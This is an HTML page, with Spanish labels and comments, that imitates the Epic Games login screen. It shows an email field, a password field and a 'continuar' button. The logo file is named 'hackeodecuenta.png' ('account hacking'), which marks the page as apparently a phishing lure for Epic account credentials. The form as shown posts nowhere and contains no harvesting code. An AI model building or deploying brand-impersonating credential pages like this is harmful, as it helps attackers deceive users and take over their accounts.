<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Epic Games Login</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background-color: #171717;
      margin: 0;
      padding: 0;
      display: flex;
      justify-content: center;
      align-items: center;
      height: 100vh;
    }
    
    .container {
      background-color: #0a0a0a;
      padding: 40px;
      border-radius: 8px;
      box-shadow: 0 0 20px rgba(0, 0, 0, 0.5);
      max-width: 400px;
      width: 100%;
      text-align: center; /* Centrar el contenido */
    }
    
    h2 {
      text-align: center;
      margin-bottom: 30px;
      color: #fff;
    }
    
    img {
      width: 120px; /* Tamaño del logo */
      margin-bottom: 20px; /* Espacio debajo del logo */
    }
    
    input[type="text"],
    input[type="password"] {
      width: 100%;
      padding: 15px;
      margin-bottom: 20px;
      border: none;
      border-radius: 5px;
      background-color: #121212;
      color: #fff;
      font-size: 16px;
      outline: none;
    }
    
    input[type="text"]::placeholder,
    input[type="password"]::placeholder {
      color: #999;
      font-size: 16px; /* Tamaño normal */
      transition: font-size 0.3s ease; /* Transición suave */
    }
    
    input[type="text"]:focus::placeholder,
    input[type="password"]:focus::placeholder {
      font-size: 12px; /* Tamaño más pequeño al enfocar */
    }
    
    input[type="submit"] {
      background-color: #0077ff;
      color: #fff;
      border: none;
      padding: 15px;
      border-radius: 5px;
      cursor: pointer;
      width: 100%;
      display: block;
      font-size: 16px;
      transition: background-color 0.3s ease;
    }
    
    input[type="submit"]:hover {
      background-color: #0057cb;
    }

    .forgot-password {
      text-align: left;
      font-size: 12px;
      color: #fff;
      margin-top: 10px;
    }

    .forgot-password a {
      color: #fff;
    }
  </style>
</head>
<body>
  <div class="container">
    <img src="hackeodecuenta.png" alt="Epic Games Logo">
    <h2>Inicia sesión o regístrate</h2>
    <form action="#">
      <input type="text" placeholder="Dirección de correo electrónico">
      <input type="password" placeholder="Contraseña">
      <input type="submit" value="continuar">
      <p class="forgot-password"><a href="#">¿Olvidaste tu contraseña?</a></p>
    </form>
  </div>
</body>
</html>
